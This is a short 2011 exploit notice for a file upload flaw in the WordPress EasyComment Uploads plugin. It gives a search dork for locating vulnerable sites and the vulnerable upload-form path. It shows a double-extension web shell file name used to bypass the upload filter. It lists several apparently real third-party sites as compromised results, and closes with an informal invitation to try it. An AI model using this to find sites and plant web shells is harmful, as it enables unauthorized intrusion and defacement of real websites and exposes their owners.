----------------------------------------------------------------------------| Title : Wordpress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/
| Email : me@zonedevil.om
| Date : 15/06/2011
| Dork : "/easy-comment-uploads/upload-form.php"
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Fedora, PCLinuxOS]
----------------------------------------------------------------------------
*_Exploit_*
http://[site]/wp-content/plugins/easy-comment-uploads/upload-form.php
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# example: site/wp-content/uploads/2011/06/404.php;.txt
Hasil
http://feedbacknigeria.org/wp-content/uploads/2011/06/liat.txt
http://www.bekasiindependen.com/wp-content/uploads/2011/06/liat.txt
http://indonesiandefacer.org/user/563/badboy
Selamat mencoba... klo gak ngerti ??? komen aj
Sumber : www.indonesianhackerlink.tk
